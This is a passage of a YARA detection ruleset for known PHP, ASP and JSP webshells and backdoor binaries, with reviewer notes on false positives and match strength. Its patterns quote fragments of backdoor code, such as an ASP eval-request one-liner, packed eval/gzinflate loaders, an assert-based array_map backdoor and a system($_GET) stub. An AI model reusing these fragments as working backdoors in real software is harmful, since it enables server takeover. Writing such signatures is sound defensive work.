		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt"
		super_rule = 1
		was = "_nst_php_php_cybershell_php_php_img_php_php_nstview_php_php"
		hash0 = "ddaf9f1986d17284de83a17fe5f9fd94"
		hash1 = "ef8828e0bc0641a655de3932199c0527"
		hash2 = "17a07bb84e137b8aa60f87cd6bfab748"
		hash3 = "4745d510fed4378e4b1730f56f25e569"
	strings:
		$nst_rto  = "@$rto=$_POST['rto'];" fullword
		$nst_css  = "SCROLLBAR-TRACK-COLOR: #91AAFF" fullword
		$nst_path = "$to1=str_replace(\"//\",\"/\",$to1);" fullword
	condition:
		2 of ($nst_*)
}
// svchostdll.dll: service-hosted backdoor DLL with rundll32 install/uninstall
// entry points.
// NOTE(review): $s0, $s1, $s2, $s6 and $s7 are ordinary export / import names
// that many legitimate service DLLs also carry; the discriminating strings are
// the build-specific fragments $s3, $s4, $s5 and $s8, and "all of them" is
// what keeps this rule from hitting benign service installers.
rule svchostdll {
	meta:
		description = "Webshells Auto-generated - file svchostdll.dll"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "0f6756c8cb0b454c452055f189e4c3f4"
	strings:
		// generic exports (weak on their own)
		$s0 = "InstallService"
		$s1 = "RundllInstallA"
		$s2 = "UninstallService"
		// build-specific text fragments
		$s3 = "&G3 Users In RegistryD"
		$s4 = "OL_SHUTDOWN;I"
		$s5 = "SvcHostDLL.dll"
		// generic export / WinINet import (weak on their own)
		$s6 = "RundllUninstallA"
		$s7 = "InternetOpenA"
		// build-specific fragment
		$s8 = "Check Cloneomplete"
	condition:
		all of them
}
// 1.asp: classic one-line ASP eval backdoor, <%eval request("pass")%>,
// padded with a run of '2' characters; both lines must be present.
rule webshell_asp_1 {
	meta:
		author = "Florian Roth"
		description = "Web Shell - file 1.asp"
		date = "2014/01/28"
		score = 70
		hash = "8991148adf5de3b8322ec5d78cb01bdb"
	strings:
		$asp_padding = "!22222222222222222222222222222222222222222222222222" fullword
		$asp_eval    = "<%eval request(\"pass\")%>" fullword
	condition:
		$asp_padding and $asp_eval
}
// JspSpy 2009/2010 variants: encoding selector, upload failure message,
// CURRENT_DIR session attribute and the Invoker dispatch table.
rule webshell_000_403_c5_queryDong_spyjsp2010 {
	meta:
		author = "Florian Roth"
		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
		hash2 = "8b457934da3821ba58b06a113e0d53d9"
		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
		hash4 = "655722eaa6c646437c8ae93daac46ae0"
	strings:
		$spy_encode   = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
		$spy_upl_fail = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
		$spy_curdir   = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
		$spy_invoker  = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
	condition:
		2 of ($spy_*)
}
// JSP shells (2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp) that mimic an
// ASP.NET WebForms page.
// NOTE(review): all three strings are page boilerplate — a gb2312 charset
// meta tag and two hidden form fields imitating ASP.NET's postback inputs —
// rather than shell logic, and the condition only needs two of them. Expect
// false positives on hand-written Chinese-language pages that copy the same
// markup; treat a hit as a candidate for review, not as a confirmed shell.
rule webshell_2_520_icesword_job_ma1 {
	meta:
		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "64a3bf9142b045b9062b204db39d4d57"
		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
		hash3 = "56c005690da2558690c4aa305a31ad37"
		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
	strings:
		// charset declaration shared by the Chinese-language samples
		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
		// single-underscore look-alikes of ASP.NET's __EVENTTARGET/__EVENTARGUMENT fields
		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
	condition:
		2 of them
}
// ice.asp: the page is stored as Microsoft Script-Encoded VBScript (the
// "@#@&" marker is characteristic of that encoding), so the pattern is a raw
// fragment of the encoded stream rather than readable code. It will only
// match this exact encoding of the sample; a re-encode defeats it.
rule webshell_asp_ice {
	meta:
		description = "Web Shell - file ice.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "d141e011a92f48da72728c35f1934a2b"
	strings:
		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
	condition:
		all of them
}
// C99madShell 2.0 "madnet edition": gzinflate/base64 packed body preceded by
// the unfilled login/pass/md5 configuration block. All five must be present,
// which keeps the generic eval(gzinflate(base64_decode(' prefix from firing
// on its own.
rule WebShell_C99madShell_v__2_0_madnet_edition {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php"
		hash = "f99f8228eb12746847f54bad45084f19d1a7e111"
	strings:
		$mad_md5   = "$md5_pass = \"\"; //If no pass then hash" fullword
		$mad_eval  = "eval(gzinflate(base64_decode('"
		$mad_pass  = "$pass = \"\";  //Pass" fullword
		$mad_login = "$login = \"\"; //Login" fullword
		$mad_auth  = "//Authentication" fullword
	condition:
		all of ($mad_*)
}
// zehir / elmaliseker ASP shells: the client-side JavaScript that builds the
// multi-file upload form is identical across variants; one hit is enough.
rule Webshell_zehir {
	meta:
		author = "Florian Roth"
		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
		reference = "https://github.com/nikicat/web-malware-collection"
		date = "2016-01-11"
		score = 70
		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
	strings:
		$zehir_upload_loop = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
		$zehir_upload_min  = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
	condition:
		filesize < 200KB and 1 of ($zehir_*)
}
// byshell 0.63 ntboot.exe: installs the "NtBoot" service; the status
// messages are from its own console output.
rule byshell063_ntboot {
	meta:
		author = "Yara Bulk Rule Generator by Florian Roth"
		description = "Webshells Auto-generated - file ntboot.exe"
		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
	strings:
		$nb_svc_key  = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
		$nb_denied   = "Failure ... Access is Denied !"
		$nb_dumping  = "Dumping Description to Registry..."
		$nb_open_svc = "Opening Service .... Failure !"
	condition:
		all of ($nb_*)
}
// small.php: gzinflate/base64 packed shell with a placeholder MD5 password
// and error logging disabled. Two of the three lines are required.
rule small_php_php {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - file small.php.php.txt"
		hash = "fcee6226d09d150bfa5f103bee61fbde"
	strings:
		$sm_pass   = "$pass='abcdef1234567890abcdef1234567890';" fullword
		$sm_packed = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
		$sm_nolog  = "@ini_set('error_log',NULL);" fullword
	condition:
		2 of ($sm_*)
}
// NIX REMOTE WEB-SHELL / nstview / Cyber Shell: stylesheet selector, the
// backslash-to-slash path fix and the dot-entry skip in the directory walker.
rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {
	meta:
		author = "Florian Roth"
		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
		date = "2014/01/28"
		score = 70
		super_rule = 1
		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
		hash1 = "4745d510fed4378e4b1730f56f25e569"
		hash2 = "f3ca29b7999643507081caab926e2e74"
		hash3 = "46a18979750fa458a04343cf58faa9bd"
	strings:
		$nix_css      = "BODY, TD, TR {" fullword
		$nix_pathfix  = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
		$nix_dotskip  = "if ($file==\".\" || $file==\"..\") continue;" fullword
	condition:
		2 of ($nix_*)
}
// connectback2.pl: Perl reverse-shell script.
// NOTE(review): with "1 of them", the plain-text credit line $s0 and the
// generic label $s2 ("ConnectBack Backdoor") each fire alone, so any file
// that merely quotes them — signature databases, write-ups, this ruleset —
// will match. Scope scans away from rule/IOC repositories or require $s1
// (the actual command string) when tuning.
rule connectback2_pl {
	meta:
		description = "Semi-Auto-generated  - file connectback2.pl.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "473b7d226ea6ebaacc24504bd740822e"
	strings:
		// author credit (trailing spaces are part of the sample line)
		$s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL                                   "
		// the shell's banner command line — the only string tied to behaviour
		$s1 = "echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shel"
		// generic label
		$s2 = "ConnectBack Backdoor"
	condition:
		1 of them
}
// qsd-php-backdoor: file editor that takes base64+urlencoded content in
// $_POST["newcontent"]; the author credit comment is also matched.
rule WebShell_qsd_php_backdoor {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - file qsd-php-backdoor.php"
		hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f"
	strings:
		$qsd_credit   = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c"
		$qsd_isset    = "if(isset($_POST[\"newcontent\"]))" fullword
		$qsd_pathjoin = "foreach($parts as $val)//Assemble the path back together" fullword
		$qsd_decode   = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
	condition:
		2 of ($qsd_*)
}
// s72 Shell v1.x (Turkish-language): directory header markup, the author
// banner and the "file already exists" message. Any one of them triggers.
rule s72_Shell_v1_1_Coding_html {
	meta:
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		description = "Semi-Auto-generated  - file s72 Shell v1.1 Coding.html.txt"
		hash = "c2e8346a5515c81797af36e7e4a3828e"
	strings:
		$s72_dizin  = "Dizin</font></b></font><font face=\"Verdana\" style=\"font-size: 8pt\"><"
		$s72_banner = "s72 Shell v1.0 Codinf by Cr@zy_King"
		$s72_exists = "echo \"<p align=center>Dosya Zaten Bulunuyor</p>\""
	condition:
		1 of ($s72_*)
}
// jfigueiredo's JSP file browser (Browser.jsp), observed dropped by APT actors
// as a ready-made web shell.
// NOTE(review): the matched strings are the browser's own upload form and
// path encoding, so a legitimate deployment of that file manager will match
// exactly like a malicious drop — hence the lower score (60). The reference
// URL points at Google Code, which has since been shut down; the link is
// kept for provenance but should not be expected to resolve.
rule JSP_jfigueiredo_APT_webshell {
	meta:
		description = "JSP Browser used as web shell by APT groups - author: jfigueiredo"
		author = "F.Roth"
		date = "12.10.2014"
		score = 60
		reference = "http://ceso.googlecode.com/svn/web/bko/filemanager/Browser.jsp"
	strings:
		// hidden-field path encoding used by the browser
		$a1 = "String fhidden = new String(Base64.encodeBase64(path.getBytes()));" ascii
		// upload form posting to the ServFMUpload servlet
		$a2 = "<form id=\"upload\" name=\"upload\" action=\"ServFMUpload\" method=\"POST\" enctype=\"multipart/form-data\">" ascii
	condition:
		all of them
}
// Cyber Shell (cyberlords.net, coded by Pixcher): footer link, edit redirect,
// author credit and the new-file input.
rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
		super_rule = 1
		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
	strings:
		$cs_footer   = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
		$cs_redirect = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
		$cs_credit   = " *   Coded by Pixcher" fullword
		$cs_newfile  = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
	condition:
		2 of ($cs_*)
}
// sendmail.exe as bundled with a webshell kit.
// NOTE(review): $s6 is the copyright banner of a Diamond Computer Systems
// command-line mailer, which appears to be a legitimately distributed utility;
// the only other anchor is the build fragment $s3. A hit therefore means
// "this particular mailer build is present", not that it is malicious by
// itself — corroborate with where the file was found.
rule sendmail {
	meta:
		description = "Webshells Auto-generated - file sendmail.exe"
		author = "Yara Bulk Rule Generator by Florian Roth"
		hash = "75b86f4a21d8adefaf34b3a94629bd17"
	strings:
		// build-specific fragment
		$s3 = "_NextPyC808"
		// vendor copyright banner (shared with legitimate copies of the tool)
		$s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)"
	condition:
		all of them
}
// sql.php: RST MySQL tools (rst.void.ru) database shell.
// NOTE(review): the condition is "1 of them" and $s2 is nothing more than the
// crew's home-page URL. Any file that mentions http://rst.void.ru — blocklists,
// write-ups, and this ruleset itself, which carries the same literal — will
// match. Prefer $s1 or $s3 as evidence; treat an $s2-only hit as weak.
rule sql_php_php {
	meta:
		description = "Semi-Auto-generated  - file sql.php.php.txt"
		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
		hash = "8334249cbb969f2d33d678fec2b680c5"
	strings:
		// SQL dump header written by the tool
		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#\""
		// bare URL — weak on its own (see note above)
		$s2 = "http://rst.void.ru"
		// navigation link carrying the DB credentials in the query string
		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
	condition:
		1 of them
}
// 1d.asp: Microsoft Script-Encoded ASP (the "@#@&" token is characteristic of
// that encoding). The pattern is a fragment of the encoded stream, so it
// matches only this exact encoding of the sample and not a re-encoded copy.
rule webshell_asp_1d {
	meta:
		description = "Web Shell - file 1d.asp"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "fad7504ca8a55d4453e552621f81563c"
	strings:
		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
	condition:
		all of them
}
// b37.php: the sample is stored as an opaque base64-looking blob; the pattern
// is a 48-character slice of that blob, so it identifies this exact payload
// encoding only. A re-packed or differently encoded variant will not match.
rule webshell_PHP_b37 {
	meta:
		description = "Web Shell - file b37.php"
		author = "Florian Roth"
		date = "2014/01/28"
		score = 70
		hash = "0421445303cfd0ec6bc20b3846e30ff0"
	strings:
		$s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc"
	condition:
		all of them
}
// HYTop AppPack 2005.asp: the onclick handler that pre-fills the SQL box with
// the kit's own e:\hytop.mdb path.
rule HYTop_AppPack_2005 {
	meta:
		author = "Yara Bulk Rule Generator by Florian Roth"
		description = "Webshells Auto-generated - file 2005.asp"
		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
	strings:
		$hytop_mdb = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
	condition:
		$hytop_mdb
}
// ironshell.php ("Shell I"): page title, MySQL login form, chmod form and the
// brute-force options; three of eight lines are required.
rule WebShell_ironshell {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - file ironshell.php"
		hash = "d47b8ba98ea8061404defc6b3a30839c4444a262"
	strings:
		$ir_title     = "<title>'.getenv(\"HTTP_HOST\").' ~ Shell I</title>" fullword
		$ir_mysql     = "$link = mysql_connect($_POST['host'], $_POST['username'], $_POST"
		$ir_errorrep  = "error_reporting(0); //If there is an error, we'll show it, k?" fullword
		$ir_chmod     = "print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&d"
		$ir_timelimit = "if(!is_numeric($_POST['timelimit']))" fullword
		$ir_chars     = "if($_POST['chars'] == \"9999\")" fullword
		$ir_charset   = "<option value=\\\"az\\\">a - zzzzz</option>" fullword
		$ir_exec      = "print shell_exec($command);" fullword
	condition:
		3 of ($ir_*)
}
// STNC WebShell 0.8: action dispatcher, system() fallback with output
// buffering, and the chdir-on-POST handler.
rule WebShell_STNC_WebShell_v0_8 {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php"
		hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc"
	strings:
		$stnc_action = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword
		$stnc_system = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()"
		$stnc_chdir  = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw"
	condition:
		2 of ($stnc_*)
}
// dC3 Security Crew Shell PRiV: rmdir/search/rename handlers driven by raw
// $_GET/$_POST parameters, embedded image table and the far-future Expires
// header. Three of six lines are required.
rule WebShell_dC3_Security_Crew_Shell_PRiV {
	meta:
		author = "Florian Roth"
		description = "PHP Webshells Github Archive - file dC3_Security_Crew_Shell_PRiV.php"
		hash = "1b2a4a7174ca170b4e3a8cdf4814c92695134c8a"
	strings:
		$dc3_rmdir   = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword
		$dc3_docroot = "$ps=str_replace(\"\\\\\",\"/\",getenv('DOCUMENT_ROOT'));" fullword
		$dc3_expires = "header(\"Expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));" fullword
		$dc3_search  = "search_file($_POST['search'],urldecode($_POST['dir']));" fullword
		$dc3_images  = "echo base64_decode($images[$_GET['pic']]);" fullword
		$dc3_rename  = "if (isset($_GET['rename_all'])) {" fullword
	condition:
		3 of ($dc3_*)
}
rule webshell_PHP_g00nv13 {
    // g00nv13.php: archive-type switch and session-backed MySQL connect; both strings required.
    meta:
        description = "Web Shell - file g00nv13.php"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        hash = "35ad2533192fe8a1a76c3276140db820"
    strings:
        $archive_switch = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas" ascii
        $sql_connect = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p" ascii
    condition:
        $archive_switch and $sql_connect
}
rule webshell_webshells_new_php2 {
    // php2.php one-liner: pins the opening stub that reads $_GET[2] and gates on an md5 check.
    meta:
        description = "Web shells - generated from file php2.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "fbf2e76e6f897f6f42b896c855069276"
    strings:
        $stub = "<?php $s=@$_GET[2];if(md5($s.$s)==" ascii
    condition:
        $stub
}
rule webshell_webshells_new_PHP {
    // PHP.php: any single string fires. Note for tuning: $err_font and $textarea are generic HTML and may
    // match benign pages on their own; $fopen_post (fopen of a POST-supplied path for writing) is the strongest.
    meta:
        description = "Web shells - generated from file PHP.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
    strings:
        $err_font = "echo \"<font color=blue>Error!</font>\";" ascii fullword
        $script_file_input = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE" ascii
        $expdoor_title = " - ExpDoor.com</title>" ascii fullword
        $fopen_post = "$f=fopen($_POST[\"f\"],\"w\");" ascii fullword
        $textarea = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" ascii fullword
    condition:
        any of them
}
rule Java_Shell_js {
    // Jython-based shell applet: interpreter bootstrap, class declaration, scrollback constant; two hits required.
    meta:
        description = "Semi-Auto-generated  - file Java Shell.js.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "36403bc776eb12e8b7cc0eb47c8aac83"
    strings:
        $py_init = "PySystemState.initialize(System.getProperties(), null, argv);" ascii fullword
        $jython_class = "public class JythonShell extends JPanel implements Runnable {" ascii fullword
        $scrollback = "public static int DEFAULT_SCROLLBACK = 100" ascii
    condition:
        2 of ($py_init, $jython_class, $scrollback)
}
rule FSO_s_RemExp {
    // RemExp.asp file browser: three table-cell templates rendering folder/file names and attributes; all required.
    meta:
        description = "Webshells Auto-generated - file RemExp.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "b69670ecdbb40012c73686cd22696eeb"
    strings:
        $subfolder_cell = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser" ascii
        $file_cell = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F" ascii
        $attr_cell = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></" ascii
    condition:
        $subfolder_cell and $file_cell and $attr_cell
}
rule HDConfig {
    // HDConfig.exe: five CryptoAPI progress/error messages, all required.
    // NOTE(review): these read like stock CryptoAPI sample-program messages rather than tool-specific text,
    // so other binaries built from the same sample could also match — confirm against benign corpora.
    meta:
        description = "Webshells Auto-generated - file HDConfig.exe"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "7d60e552fdca57642fd30462416347bd"
    strings:
        $key_derived = "An encryption key is derived from the password hash. " ascii
        $hash_created = "A hash object has been created. " ascii
        $hash_error = "Error during CryptCreateHash!" ascii
        $container_created = "A new key container has been created." ascii
        $pw_added = "The password has been added to the hash. " ascii
    condition:
        all of ($*)
}
rule FeliksPack3___PHP_Shells_ssh {
    // ssh.php: pins the stacked decode-and-eval prefix used to unpack the payload.
    meta:
        description = "Webshells Auto-generated - file ssh.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "1aa5307790d72941589079989b4f900e"
    strings:
        $stacked_decode = "eval(gzinflate(str_rot13(base64_decode('" ascii
    condition:
        $stacked_decode
}
rule elmaliseker {
    // elmaliseker.asp: JavaScript download command plus its zombie_array declaration; both required.
    meta:
        description = "Webshells Auto-generated - file elmaliseker.asp"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "ccf48af0c8c09bbd038e610a49c9862e"
    strings:
        $download_cmd = "javascript:Command('Download'" ascii
        $zombie_array = "zombie_array=array(" ascii
    condition:
        $download_cmd and $zombie_array
}
rule ru24_post_sh_php_php {
    // Ru24PostWebShell: title template, default command list, author tag; any one string fires.
    meta:
        description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        hash = "5b334d494564393f419af745dc1eeec7"
    strings:
        $title = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" ascii fullword
        $default_cmd = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a" ascii
        $author_tag = "Writed by DreAmeRz" ascii fullword
    condition:
        any of them
}
rule FSO_s_phpinj_2 {
    // phpinj.php: pins the PHP stub embedded in an INSERT ... INTO statement.
    meta:
        description = "Webshells Auto-generated - file phpinj.php"
        author = "Yara Bulk Rule Generator by Florian Roth"
        hash = "dd39d17e9baca0363cc1c3664e608929"
    strings:
        $sql_embedded_stub = "<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO" ascii
    condition:
        $sql_embedded_stub
}
rule multiple_webshells_0004 {
    // c99-family super rule: the "Done!" HTML footer and the matching log footer; either one fires.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_SpecialShell_99_php_php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
        hash3 = "09609851caa129e40b0d56e90dfc476c"
    strings:
        $done_html = "echo \"<hr size=\\\"1\\\" noshade><b>Done!</b><br>Total time (secs.): \".$ft" ascii
        $done_log = "$fqb_log .= \"\\r\\n------------------------------------------\\r\\nDone!\\r" ascii
    condition:
        any of them
}
rule webshell_807_a_css_dm_he1p_JspSpy_xxx {
    // JspSpy-family super rule: three UI template fragments (remote control, current file); all required.
    meta:
        description = "Web Shell - from files 807.jsp, a.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, style.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
        author = "Florian Roth"
        date = "2014/01/28"
        score = 70
        super_rule = 1
        hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
        hash1 = "76037ebd781ad0eac363d56fc81f4b4f"
        hash2 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
        hash3 = "14e9688c86b454ed48171a9d4f48ace8"
        hash4 = "b330a6c2d49124ef0729539761d6ef0b"
        hash5 = "d71716df5042880ef84427acee8b121e"
        hash6 = "341298482cf90febebb8616426080d1d"
        hash7 = "29aebe333d6332f0ebc2258def94d57e"
        hash8 = "42654af68e5d4ea217e6ece5389eb302"
        hash9 = "88fc87e7c58249a398efd5ceae636073"
        hash10 = "4a812678308475c64132a9b56254edbc"
        hash11 = "9626eef1a8b9b8d773a3b2af09306a10"
        hash12 = "344f9073576a066142b2023629539ebd"
        hash13 = "32dea47d9c13f9000c4c807561341bee"
        hash14 = "b9744f6876919c46a29ea05b1d95b1c3"
        hash15 = "6acc82544be056580c3a1caaa4999956"
        hash16 = "6aa32a6392840e161a018f3907a86968"
        hash17 = "349ec229e3f8eda0f9eb918c74a8bf4c"
        hash18 = "3ea688e3439a1f56b16694667938316d"
        hash19 = "ab77e4d1006259d7cbc15884416ca88c"
        hash20 = "71097537a91fac6b01f46f66ee2d7749"
        hash21 = "2434a7a07cb47ce25b41d30bc291cacc"
        hash22 = "7a4b090619ecce6f7bd838fe5c58554b"
    strings:
        $remote_control = "\"<h2>Remote Control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var" ascii
        $current_file_import = "\"<p>Current File (import new file name and new file)<br /><input class=\\\"inpu" ascii
        $current_file_fullpath = "\"<p>Current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i" ascii
    condition:
        $remote_control and $current_file_import and $current_file_fullpath
}
rule multiple_webshells_0030 {
    // c99-family super rule: disk-space and drive-letter probing code; two hits required.
    meta:
        description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt"
        author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
        super_rule = 1
        was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_1_SpecialShell_99_php_php"
        hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"
        hash1 = "3ca5886cd54d495dc95793579611f59a"
        hash2 = "9c5bb5e3a46ec28039e8986324e42792"
        hash3 = "44542e5c3e9790815c49d5f9beffbbf2"
        hash4 = "09609851caa129e40b0d56e90dfc476c"
    strings:
        $total_false = "if ($total === FALSE) {$total = 0;}" ascii fullword
        $free_percent = "$free_percent = round(100/($total/$free),2);" ascii fullword
        $is_dir_letter = "if (!$bool) {$bool = is_dir($letter.\":\\\\\");}" ascii fullword
        $diskette = "$bool = $isdiskette = in_array($letter,$safemode_diskettes);" ascii fullword
    condition:
        2 of ($*)
}
rule webshell_webshells_new_xxx {
    // xxx.php one-liner: array_map over $_REQUEST with the callable name split by a \x65 escape to dodge naive grep.
    meta:
        description = "Web shells - generated from file xxx.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "0e71428fe68b39b70adb6aeedf260ca0"
    strings:
        $escaped_callable = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" ascii fullword
    condition:
        $escaped_callable
}
rule webshell_webshells_new_code {
    // code.php file manager: directory links, POSTed dir handling, upload move, runtime footer; any one fires.
    meta:
        description = "Web shells - generated from file code.php"
        author = "Florian Roth"
        date = "2014/03/28"
        score = 70
        hash = "a444014c134ff24c0be5a05c02b81a79"
    strings:
        $show_dir_link = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi" ascii
        $post_dir_utf8 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO" ascii
